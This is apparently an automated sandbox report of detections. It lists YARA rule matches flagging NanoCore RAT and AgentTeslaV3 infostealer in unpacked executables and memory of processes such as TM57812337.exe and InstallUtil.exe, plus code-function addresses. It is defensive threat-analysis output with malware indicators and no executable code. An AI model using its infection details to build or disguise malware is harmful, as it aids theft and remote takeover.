                Source: 12.3.Qqsucntzxgqwkiqkvrafiufflip.exe.3f30b50.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 32.2.InstallUtil.exe.3faff34.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 32.2.InstallUtil.exe.3faff34.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 32.2.InstallUtil.exe.3faff34.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 32.2.InstallUtil.exe.3fab0fe.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 32.2.InstallUtil.exe.3fab0fe.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 32.2.InstallUtil.exe.3fab0fe.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 32.2.InstallUtil.exe.3fab0fe.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 0.3.TM57812337.exe.36e8e80.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 32.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 32.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 32.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 32.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 33.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 32.2.InstallUtil.exe.3faff34.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 32.2.InstallUtil.exe.3faff34.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 32.2.InstallUtil.exe.3faff34.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 12.3.Qqsucntzxgqwkiqkvrafiufflip.exe.3f30b50.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 16.2.Qjarsxlh.exe.59f0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 0.2.TM57812337.exe.3637b90.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.2e3c86c.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.2e3c86c.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.2e3c86c.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.2e3c86c.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.2e3c86c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.2e3c86c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.2e3c86c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.2e3c86c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 15.2.Qjarsxlh.exe.4417b90.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.TM57812337.exe.3637b90.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.5cd0000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 12.3.Qqsucntzxgqwkiqkvrafiufflip.exe.3ef0b30.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.5cd0000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 33.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.3.TM57812337.exe.36a8e60.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 0.3.TM57812337.exe.3688e40.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 12.3.Qqsucntzxgqwkiqkvrafiufflip.exe.3fb0b70.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 15.3.Qjarsxlh.exe.4468e40.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 0.3.TM57812337.exe.3768ea0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 0000000C.00000002.476919142.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 00000020.00000002.491043035.0000000006090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 00000020.00000002.491043035.0000000006090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000020.00000002.491043035.0000000006090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                Source: 00000000.00000002.360544284.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 00000020.00000000.473733509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 00000020.00000000.473733509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 00000020.00000002.490004111.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 00000020.00000000.472431522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 00000020.00000000.472431522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 00000020.00000002.488350765.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 00000020.00000002.488350765.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 00000020.00000000.472817757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 00000020.00000000.472817757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 00000010.00000002.508484748.00000000059F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 00000020.00000000.473252440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 00000020.00000000.473252440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 0000000C.00000002.475784725.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 0000000C.00000002.475784725.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 0000000F.00000002.491110453.00000000061C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 0000000C.00000002.476158261.0000000003F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 0000000C.00000002.476158261.0000000003F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 00000022.00000002.541013237.00000000057B0000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 00000020.00000002.490307943.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 0000000C.00000002.476008629.0000000003E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 0000000C.00000002.476008629.0000000003E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: 0000000C.00000002.475883360.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: 0000000C.00000002.475883360.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: Process Memory Space: Qqsucntzxgqwkiqkvrafiufflip.exe PID: 6528, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: Process Memory Space: Qqsucntzxgqwkiqkvrafiufflip.exe PID: 6528, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: Process Memory Space: InstallUtil.exe PID: 6288, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                Source: Process Memory Space: InstallUtil.exe PID: 6288, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_0231B348
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_0231A0F8
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_02316B80
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_0231D848
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_02319929
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_0231B5E0
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_02316EB0
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_02317C68
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_05400448
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_05408CF0
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 0_2_053F0578
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeCode function: 12_2_02C1B2A8
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeCode function: 12_2_02C1A058
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeCode function: 12_2_02C1D7A8
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeCode function: 12_2_02C16AE0
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeCode function: 12_2_02C19889
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeCode function: 12_2_02C1B540
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeCode function: 12_2_02C17B60
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeCode function: 12_2_02C16E10
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeCode function: 12_2_05E28CF0
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeCode function: 12_2_05E10578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_013CF0C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 14_2_013CF408
